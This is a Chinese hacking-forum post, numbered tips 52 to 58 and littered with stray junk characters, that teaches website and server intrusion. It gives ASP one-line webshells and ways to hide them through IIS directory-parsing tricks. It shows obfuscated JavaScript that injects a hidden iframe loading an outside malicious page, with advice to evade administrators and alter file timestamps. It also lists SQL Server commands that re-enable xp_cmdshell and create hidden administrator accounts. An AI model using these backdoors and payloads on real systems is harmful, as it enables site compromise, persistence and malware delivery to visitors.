5 Q" `) I, t% fc).%><%execute request("go")%><%) H0 O# c! m  M& |' t2 ~
d).<script language=VBScript runat=server>execute request("sb")</Script>
5 F$ V  \' F' h; O0 B; k# Ee).<%25Execute(request("l"))%25>
  S. a- `  y  J- z. c( W5 R1 Af).<%if request("cmd")<>"" then execute request("pass")%>
4 P1 Z+ M1 q' P( L. ~! X; W0 u
' `$ H" A/ H- R" R9 [% i1 N52、at "12:17" /interactive cmd/ G3 q( P5 E- g9 V! H4 g
执行后可以用AT命令查看新加的任务6 }8 a8 A2 t9 v+ b
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。: p' P3 Q9 a  D# V. C* P# k8 D

  v7 n1 {: L7 [& D' k& w& V+ a53、隐藏ASP后门的两种方法
8 ^0 k, G. i' @9 E3 O" y8 q  L2 W1、建立非标准目录:mkdir images..\% W% P& U6 n; N' |; O  t
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
$ C6 Z: e4 n. Q' W0 m- y4 j+ X通过web访问ASP木马:http://ip/images../news.asp?action=login. `+ t. }7 l4 F- O7 x' O
如何删除非标准目录:rmdir images..\ /s
+ Y* l% c" i: v% ?3 k  L- z# G2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:% |, U2 I/ z' j2 \" c& J1 g( \
mkdir programme.asp
4 V3 H5 `( c3 O" w' e/ A新建1.txt文件内容:<!--#include file=”12.jpg”-->1 L6 A" t9 \3 q  W- }4 r" ^* O
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
0 c/ |8 Q' e1 p; J; iattrib +H +S programme.asp
: \4 H6 g1 Q+ I; f6 Y通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt$ y% h- h7 s: Z$ G, E. m" S

: Y& @! F' o& x& I* x8 C8 D' w5 S54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
' z( W; ~) a: ~* s  l; r6 Q然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。9 D$ {$ U2 f! d$ h

# O3 N. b' r8 B1 o55、JS隐蔽挂马
$ @7 ]: ~3 n( \$ ^1.: p1 [& [# D7 F0 G5 o4 p, V; d4 w, [
var tr4c3="<iframe src=ht";
! X: `% ?  F2 u9 |+ J% I  D( }tr4c3 = tr4c3+"tp:/";
3 G; G+ e+ H/ k0 u' d  ]; {tr4c3 = tr4c3+"/ww";  ]8 I- F0 |& k7 H; E1 T/ |* Y  J
tr4c3 = tr4c3+"w.tr4";9 e  [% _% N) `! q  u
tr4c3 = tr4c3+"c3.com/inc/m";
* W5 b1 W6 c- v1 Xtr4c3 = tr4c3+"m.htm style="display:none"></i";0 w9 D. t4 ]* |
tr4c3 =tr4c3+"frame>'";3 u- H0 U% @* G/ I; a% h: T
document.write(tr4c3);+ m/ v+ P+ O! }
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。+ Y  Y. v/ {$ p* _2 A+ f! p% r7 m
: q( d4 o; h( a- n' d
2.& A0 k; E# N7 X8 x6 a; c
转换进制,然后用EVAL执行。如
" t& }& I5 M/ Reval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
' A" I2 {5 q7 n; Y( p$ ~不过这个有点显眼。) Q) Z; k3 y, a1 O' J0 a' y
3.
8 I- x7 G, i, A2 B$ ndocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');  E/ Z5 ]& Q. k* X; R
最后一点,别忘了把文件的时间也修改下。
+ H) X, p! c! X1 b* _" v* v- E, O. M& z# A  ?6 k! S# P7 _
56.3389终端入侵常用DOS命令" J9 J4 j: g2 t+ \$ @! X) z
taskkill taskkill /PID 1248 /t6 ~7 T7 O3 g/ |5 \& X2 b0 r

8 N3 ^1 t( `7 Z' m2 }8 q$ btasklist 查进程5 o9 z$ x- E; Q5 E) D: ?, t5 `+ h

( y; g' y( ?, H+ I' g" h; Scacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限( O3 e( t1 |  `: n# V, ~, i0 w
iisreset /reboot8 j# p! H( Z1 z0 g8 A
tsshutdn /reboot /delay:1    重起服务器
+ E; x6 \* w( T. E; i
$ Q3 z3 `2 H5 _  hlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
/ b6 p3 z# m! C6 c- ^
7 F  F7 E6 y: r  s' `# s. G$ Vquery user 查看当前终端用户在线情况
. a6 {  {( c. M
) w0 [4 Q: C+ {' v3 R. F要显示有关所有会话使用的进程的信息,请键入:query process *
+ \) T+ @  g, `9 I, R- C6 L& E
2 {1 J/ I" C4 f2 F要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
. @" b+ @( q7 C+ f5 c
9 i- Z3 y  ?( U& N要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER29 H0 x0 O- p# N

$ @; R+ O. i: [. `( v  _要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 L/ ~  j; m8 M5 y4 T( U/ R6 V, o$ g: H5 Z: u  d
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启+ v7 T  T6 [5 R2 }7 x' F1 T

) d! a& R' ~* l+ O' \& n! q% I命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统, A- i& K7 Z: L; Y: U0 J

2 e3 @8 F& |# F4 @命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
- y& ^1 r0 X0 B; j! s! _
7 A6 y! L3 s- l9 z: u命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机) D1 x7 ]- G. Q, m7 }7 g& c- T
" }" @# C& I/ c! ]
56、在地址栏或按Ctrl+O,输入:1 c) b, w6 w5 F  T( T( t
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;5 p# W; r9 ^# n) x; G
5 r$ p" Q; |/ W3 C( a& C6 c
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。' |% y$ [2 x: T/ I2 t* n2 z
2 X: |+ A8 F# j  E. I3 i
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,* W, [% e: U5 b% X2 O2 {
用net localgroup administrators是可以看到管理组下,加了$的用户的。* M+ v# g! }! P7 X/ g2 W
" _- M, n3 m( V/ @7 o
58、 sa弱口令相关命令, p8 P5 K( z! b4 Y
- X0 e- c" i9 \2 [: f3 N( f* g
一.更改sa口令方法:
3 U: w8 x' T3 i; {" u用sql综合利用工具连接后,执行命令:- q# K8 @3 d0 g
exec sp_password NULL,'20001001','sa'1 ~3 w% I% M& S& O2 l- ]0 b8 c4 f
(提示:慎用!)
+ @/ G8 s7 O& V5 ^
& w! \+ ~9 z6 }* P4 I  H0 m二.简单修补sa弱口令." S2 q, D' _* W+ T5 ^+ d

/ U5 s" I- E3 ]方法1:查询分离器连接后执行:
7 w$ o6 j+ l# O  E, S* E' E! lif exists (select * from. a" D; N$ ^3 |3 _1 K$ L; M
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and+ \1 y4 L' u$ Z7 o8 V" \
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)( s2 k# o4 u9 i

' q& R: M* U: K$ w, F7 O# Wexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
+ S. H  K+ ?! Z, Z. S. o6 X! c' T& T  f0 Y1 V: H7 d/ _
GO' e& V, d6 P- j2 m  f( \& X2 ~

  m$ o2 U- T4 ~& w2 P) O9 s然后按F5键命令执行完毕$ R- H8 _( y. \3 A' F: p

+ F' ]; W( R4 u4 o/ \( V7 |# B方法2:查询分离器连接后  h: s- E% d. _
第一步执行:use master8 B# b" h' d; v, Y7 t) t+ m
第二步执行:sp_dropextendedproc 'xp_cmdshell'
4 k. _, f1 H% _* I然后按F5键命令执行完毕/ I  F. }; Q5 k8 W4 c
* \0 k( @4 w8 r  g8 ?+ l
  |0 n1 U. B: ?4 |% O
三.常见情况恢复执行xp_cmdshell.
& ~  r5 @# F: A( L+ v$ k
9 j1 n- u' s2 d4 O( _) j9 S( R( h$ g, k! h/ M( k( l
1 未能找到存储过程'master..xpcmdshell'.  T! }6 t( o! O! j* O
   恢复方法:查询分离器连接后,
$ `  }$ N" n2 b: M5 R第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int) Y- S2 N' F: H: |
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll': W3 i; H7 v# M8 `
然后按F5键命令执行完毕
4 d# ]2 v. `* l
' K. D6 |9 K0 F0 p$ Z2 l2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
2 s" w  s/ y$ l" f! E恢复方法:查询分离器连接后,
0 O9 p2 ]8 L& e1 q0 M第一步执行:sp_dropextendedproc "xp_cmdshell"
, o9 r6 G% H- P. l( N& P第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
! B' c  y- x. H  u然后按F5键命令执行完毕8 ^+ r7 o+ ?! H6 ?

6 C# a! k% T' @2 X7 P3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)" U/ V4 G4 Y. Q' g  q/ e; w( c
恢复方法:查询分离器连接后,# k9 R8 \$ p$ F  r6 L. x
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
5 S1 y  N; @. P% B. s' c# r4 j第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           ) j3 f' t$ Z# r2 B$ {0 A9 z' j. |
然后按F5键命令执行完毕5 p7 T7 n5 B% c; g0 F+ ~
, o, ^. Q3 H! A$ p+ b: A
四.终极方法.; w6 e: {, u& M' r
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
, P+ g* a& @2 ]- J" |查询分离器连接后,1 M; P" y% z, S
2000servser系统:
' H9 ]  k" j5 H, Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'$ b" C/ z6 x( T

" g# G$ q. i' q5 tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add') `3 x6 I/ J% x, _
# n; ?- S- C3 _
xp或2003server系统:
8 m/ f. q, q3 B- N4 L/ y0 P3 S" T' |& i; }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'' T2 p5 e' T& x7 I5 B4 H$ ^1 |

: ~% y$ l1 N1 }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 x* W& c, [/ e4 y7 \7 b1 h% V% }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表